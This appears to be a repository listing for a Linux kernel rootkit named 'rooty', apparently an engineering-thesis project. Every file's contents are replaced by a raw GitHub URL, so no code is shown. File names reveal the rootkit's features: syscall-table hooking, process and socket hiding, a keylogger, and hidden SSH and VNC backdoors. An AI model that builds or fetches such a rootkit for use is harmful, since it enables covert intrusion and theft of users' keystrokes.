├── LICENSE ├── Makefile ├── Module.symvers ├── README.md ├── art ├── init.png ├── ioctl-control.png ├── keylogger.png ├── ssh-access.png ├── ssh-init.png ├── ssh-init2.png ├── vncd-init.png └── vncd-running.png ├── docs ├── 3_PT1-2_41-s39_CELEBI_SUSKI.pdf └── Praca Inżynierska - Karol Celebi.pdf ├── init ├── ioctl.h ├── ioctl ├── Makefile ├── ioctl └── ioctl.c ├── keylogger.h ├── keymap.h ├── modules.order ├── ping.py ├── proc_fs_hide.h ├── rooty ├── rooty.c ├── rooty.ko ├── rooty.mod.c ├── rooty.mod.o ├── rooty.o ├── socket_hide.h ├── ssh.h ├── sshd ├── Makefile ├── sshd └── sshd.c ├── syscall_table.h ├── vnc.h └── vncd ├── Makefile ├── vnc-server.c └── vncd /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/LICENSE -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/Makefile -------------------------------------------------------------------------------- /Module.symvers: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/README.md -------------------------------------------------------------------------------- /art/init.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/art/init.png -------------------------------------------------------------------------------- /art/ioctl-control.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/art/ioctl-control.png -------------------------------------------------------------------------------- /art/keylogger.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/art/keylogger.png -------------------------------------------------------------------------------- /art/ssh-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/art/ssh-access.png -------------------------------------------------------------------------------- /art/ssh-init.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/art/ssh-init.png -------------------------------------------------------------------------------- /art/ssh-init2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/art/ssh-init2.png -------------------------------------------------------------------------------- /art/vncd-init.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/art/vncd-init.png -------------------------------------------------------------------------------- /art/vncd-running.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/art/vncd-running.png -------------------------------------------------------------------------------- /docs/3_PT1-2_41-s39_CELEBI_SUSKI.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/docs/3_PT1-2_41-s39_CELEBI_SUSKI.pdf -------------------------------------------------------------------------------- /docs/Praca Inżynierska - Karol Celebi.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/docs/Praca Inżynierska - Karol Celebi.pdf -------------------------------------------------------------------------------- /init: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/init -------------------------------------------------------------------------------- /ioctl.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/ioctl.h -------------------------------------------------------------------------------- /ioctl/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/ioctl/Makefile -------------------------------------------------------------------------------- /ioctl/ioctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/ioctl/ioctl -------------------------------------------------------------------------------- /ioctl/ioctl.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/ioctl/ioctl.c -------------------------------------------------------------------------------- /keylogger.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/keylogger.h -------------------------------------------------------------------------------- /keymap.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/keymap.h -------------------------------------------------------------------------------- /modules.order: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/modules.order -------------------------------------------------------------------------------- /ping.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/ping.py -------------------------------------------------------------------------------- /proc_fs_hide.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/proc_fs_hide.h -------------------------------------------------------------------------------- /rooty: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /rooty.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/rooty.c -------------------------------------------------------------------------------- /rooty.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/rooty.ko -------------------------------------------------------------------------------- /rooty.mod.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/rooty.mod.c -------------------------------------------------------------------------------- /rooty.mod.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/rooty.mod.o -------------------------------------------------------------------------------- /rooty.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/rooty.o -------------------------------------------------------------------------------- /socket_hide.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/socket_hide.h -------------------------------------------------------------------------------- /ssh.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/ssh.h -------------------------------------------------------------------------------- /sshd/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/sshd/Makefile -------------------------------------------------------------------------------- /sshd/sshd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/sshd/sshd -------------------------------------------------------------------------------- /sshd/sshd.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/sshd/sshd.c -------------------------------------------------------------------------------- /syscall_table.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/syscall_table.h -------------------------------------------------------------------------------- /vnc.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/vnc.h -------------------------------------------------------------------------------- /vncd/Makefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/vncd/Makefile -------------------------------------------------------------------------------- /vncd/vnc-server.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/vncd/vnc-server.c -------------------------------------------------------------------------------- /vncd/vncd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jermeyyy/rooty/HEAD/vncd/vncd --------------------------------------------------------------------------------